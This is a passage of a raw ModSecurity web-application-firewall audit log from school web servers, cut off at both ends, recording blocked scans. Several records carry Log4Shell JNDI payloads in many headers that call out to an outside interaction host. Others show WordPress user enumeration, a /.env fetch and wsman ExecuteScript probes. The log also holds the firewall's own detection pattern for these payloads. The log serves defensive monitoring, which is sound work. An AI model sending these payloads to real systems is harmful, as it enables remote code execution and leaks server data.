perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160591990 --9f2d1d51-C-- cH --9f2d1d51-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f2d1d51-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748468727274282 3218 (- - -) Stopwatch2: 1748468727274282 3218; combined=2067, p1=483, p2=1511, p3=22, p4=23, p5=27, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f2d1d51-Z-- --adb05521-A-- [29/May/2025:04:48:57 +0700] aDeEycX5pbyFXv2T3ipYOwAAAM8 103.236.140.4 57782 103.236.140.4 8181 --adb05521-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.132.148.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.132.148.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --adb05521-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --adb05521-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468937819242 2886 (- - -) Stopwatch2: 1748468937819242 2886; combined=1274, p1=437, p2=806, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adb05521-Z-- --8b1c2866-A-- [29/May/2025:05:06:45 +0700] aDeI9f4vV4CoZ0MKLMPd-wAAAJY 103.236.140.4 58828 103.236.140.4 8181 --8b1c2866-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.231.115.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.231.115.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8b1c2866-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b1c2866-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748470005635307 2898 (- - -) Stopwatch2: 1748470005635307 2898; combined=1311, p1=430, p2=849, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b1c2866-Z-- --388f9f7c-A-- [29/May/2025:05:43:13 +0700] aDeRgf4vV4CoZ0MKLMPeigAAAIY 103.236.140.4 60678 103.236.140.4 8181 --388f9f7c-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 1709 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 148366050 --388f9f7c-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --388f9f7c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --388f9f7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748472193894314 3803 (- - -) Stopwatch2: 1748472193894314 3803; combined=2532, p1=593, p2=1877, p3=18, p4=20, p5=24, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388f9f7c-Z-- --e7019720-A-- [29/May/2025:05:43:19 +0700] aDeRh8X5pbyFXv2T3ipZgwAAAM8 103.236.140.4 60696 103.236.140.4 8181 --e7019720-B-- GET /?x=${jndi:ldap://${:-712}${:-896}.${hostName}.uri.d0rjil9gpeoh536h8tf0p9o4xqqn6ec38.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 143614072 --e7019720-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e7019720-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748472199442744 4571 (- - -) Stopwatch2: 1748472199442744 4571; combined=3135, p1=407, p2=2698, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7019720-Z-- --797dba0a-A-- [29/May/2025:05:43:23 +0700] aDeRi8X5pbyFXv2T3ipZhAAAAMA 103.236.140.4 60696 103.236.140.4 8181 --797dba0a-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-712}${:-896}.${hostName}.referer.d0rjil9gpeoh536h8tf0cii5w63ci3o4c.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: ${jndi:ldap://${:-712}${:-896}.${hostName}.useragent.d0rjil9gpeoh536h8tf0m9wwfc3xe78ra.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-712}${:-896}.${hostName}.accept.d0rjil9gpeoh536h8tf0zzdn6jcwdfwar.oast.live} Accept-Language: ${jndi:ldap://${:-712}${:-896}.${hostName}.acceptlanguage.d0rjil9gpeoh536h8tf0a7eymjd76nfpm.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-712}${:-896}.${hostName}.accesscontrolrequestheaders.d0rjil9gpeoh536h8tf09wkx3ck6tkq6q.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-712}${:-896}.${hostName}.accesscontrolrequestmethod.d0rjil9gpeoh536h8tf06mbtocisy9g1q.oast.live} Authentication: Bearer ${jndi:ldap://${:-712}${:-896}.${hostName}.authenticationbearer.d0rjil9gpeoh536h8tf0bzauoyhi64xjo.oast.live} Location: 
${jndi:ldap://${:-712}${:-896}.${hostName}.location.d0rjil9gpeoh536h8tf0pow1t86e3ueby.oast.live} Origin: ${jndi:ldap://${:-712}${:-896}.${hostName}.origin.d0rjil9gpeoh536h8tf0mahk75nomgoj1.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-712}${:-896}.${hostName}.upgradeinsecurerequests.d0rjil9gpeoh536h8tf0mxptq7npjh86w.oast.live} X-Api-Version: ${jndi:ldap://${:-712}${:-896}.${hostName}.xapiversion.d0rjil9gpeoh536h8tf0nyeun9gcen1ct.oast.live} X-CSRF-Token: ${jndi:ldap://${:-712}${:-896}.${hostName}.xcsrftoken.d0rjil9gpeoh536h8tf0h1dj4h9pgjsh7.oast.live} X-Druid-Comment: ${jndi:ldap://${:-712}${:-896}.${hostName}.xdruidcomment.d0rjil9gpeoh536h8tf07jm4c6z6txm9r.oast.live} X-Origin: ${jndi:ldap://${:-712}${:-896}.${hostName}.xorigin.d0rjil9gpeoh536h8tf0pcjh3jdyiguic.oast.live} Cookie: ${jndi:ldap://${:-712}${:-896}.${hostName}.cookiename.d0rjil9gpeoh536h8tf0sbg9xjwky573o.oast.live}=${jndi:ldap://${:-712}${:-896}.${hostName}.cookievalue.d0rjil9gpeoh536h8tf04crxztuumtc7t.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 143614078 --797dba0a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --797dba0a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748472203414733 3654 (- - -) Stopwatch2: 1748472203414733 3654; combined=2527, p1=339, p2=2159, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --797dba0a-Z-- --c3100504-A-- [29/May/2025:05:48:28 +0700] aDeSvMX5pbyFXv2T3ipZkQAAAM8 103.236.140.4 32782 103.236.140.4 8181 --c3100504-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.179.100.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.179.100.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c3100504-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3100504-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748472508914657 2633 (- - -) Stopwatch2: 1748472508914657 2633; combined=1257, p1=407, p2=821, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3100504-Z-- --61ab3651-A-- [29/May/2025:05:57:07 +0700] aDeUw31Ye2lUDKzW1LvF2AAAABM 103.236.140.4 33154 103.236.140.4 8181 --61ab3651-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.208.42.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.208.42.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --61ab3651-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61ab3651-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748473027184344 2807 (- - -) Stopwatch2: 1748473027184344 2807; combined=1235, p1=418, p2=787, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61ab3651-Z-- --99f5a409-A-- [29/May/2025:06:00:26 +0700] aDeVin1Ye2lUDKzW1LvF-AAAABI 103.236.140.4 33248 103.236.140.4 8181 --99f5a409-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 146.190.103.103 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --99f5a409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99f5a409-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748473226398756 762 (- - -) Stopwatch2: 1748473226398756 762; combined=309, p1=262, p2=0, p3=0, p4=0, p5=47, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99f5a409-Z-- --9fbcf171-A-- [29/May/2025:06:27:40 +0700] aDeb7P4vV4CoZ0MKLMPfCQAAAI0 103.236.140.4 34530 103.236.140.4 8181 --9fbcf171-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.82.182.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.82.182.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9fbcf171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fbcf171-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748474860533066 3097 (- - -) Stopwatch2: 1748474860533066 3097; combined=1486, p1=505, p2=947, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fbcf171-Z-- --c6463e55-A-- [29/May/2025:06:29:19 +0700] aDecT31Ye2lUDKzW1LvGVAAAAAw 103.236.140.4 34568 103.236.140.4 8181 --c6463e55-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.176.128.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.176.128.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c6463e55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6463e55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748474959639321 3275 (- - -) Stopwatch2: 1748474959639321 3275; combined=1417, p1=484, p2=900, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6463e55-Z-- --74ed5e0a-A-- [29/May/2025:06:40:42 +0700] aDee-sX5pbyFXv2T3ipavgAAAM4 103.236.140.4 35918 103.236.140.4 8181 --74ed5e0a-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (SS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 164641925 --74ed5e0a-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --74ed5e0a-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --74ed5e0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748475642782777 3170 (- - -) Stopwatch2: 1748475642782777 3170; combined=2081, p1=443, p2=1566, p3=22, p4=23, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74ed5e0a-Z-- --018af153-A-- [29/May/2025:06:40:57 +0700] aDefCcX5pbyFXv2T3ipaxgAAAMU 103.236.140.4 35958 103.236.140.4 8181 --018af153-B-- GET /?x=${jndi:ldap://${:-712}${:-896}.${hostName}.uri.d0rjil9gpeoh536h8tf04u9hj3wmz3gzb.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164641943 --018af153-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --018af153-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748475657766079 4759 (- - -) Stopwatch2: 1748475657766079 4759; combined=3313, p1=434, p2=2850, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --018af153-Z-- --c8201740-A-- [29/May/2025:06:40:58 +0700] aDefCsX5pbyFXv2T3ipaxwAAAMk 103.236.140.4 35958 103.236.140.4 8181 --c8201740-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-712}${:-896}.${hostName}.referer.d0rjil9gpeoh536h8tf0i8i31q9mwzsmk.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-712}${:-896}.${hostName}.useragent.d0rjil9gpeoh536h8tf059cn5jpggzn83.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-712}${:-896}.${hostName}.accept.d0rjil9gpeoh536h8tf0iafoogs7bxk9r.oast.live} Accept-Language: ${jndi:ldap://${:-712}${:-896}.${hostName}.acceptlanguage.d0rjil9gpeoh536h8tf0ufrsy7xj6jeu8.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-712}${:-896}.${hostName}.accesscontrolrequestheaders.d0rjil9gpeoh536h8tf0a5kedpcc7bqfj.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-712}${:-896}.${hostName}.accesscontrolrequestmethod.d0rjil9gpeoh536h8tf0fwhxg69i5o5mh.oast.live} Authentication: Bearer ${jndi:ldap://${:-712}${:-896}.${hostName}.authenticationbearer.d0rjil9gpeoh536h8tf04n64pj8h1p8u6.oast.live} Location: ${jndi:ldap://${:-712}${:-896}.${hostName}.location.d0rjil9gpeoh536h8tf09yttpwex7phkh.oast.live} Origin: ${jndi:ldap://${:-712}${:-896}.${hostName}.origin.d0rjil9gpeoh536h8tf0friz68spd97ju.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-712}${:-896}.${hostName}.upgradeinsecurerequests.d0rjil9gpeoh536h8tf0snu8m9qxg9j1s.oast.live} X-Api-Version: ${jndi:ldap://${:-712}${:-896}.${hostName}.xapiversion.d0rjil9gpeoh536h8tf0xzm1cgwocc6po.oast.live} X-CSRF-Token: ${jndi:ldap://${:-712}${:-896}.${hostName}.xcsrftoken.d0rjil9gpeoh536h8tf0drjs1zy5qg9dq.oast.live} X-Druid-Comment: 
${jndi:ldap://${:-712}${:-896}.${hostName}.xdruidcomment.d0rjil9gpeoh536h8tf09ta1jb77mfc9e.oast.live} X-Origin: ${jndi:ldap://${:-712}${:-896}.${hostName}.xorigin.d0rjil9gpeoh536h8tf0btafyi9c1o7ah.oast.live} Cookie: ${jndi:ldap://${:-712}${:-896}.${hostName}.cookiename.d0rjil9gpeoh536h8tf0aihwdnkp74r5s.oast.live}=${jndi:ldap://${:-712}${:-896}.${hostName}.cookievalue.d0rjil9gpeoh536h8tf0brumntnzkg1jy.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151617674 --c8201740-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c8201740-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748475658802565 4916 (- - -) Stopwatch2: 1748475658802565 4916; combined=3615, 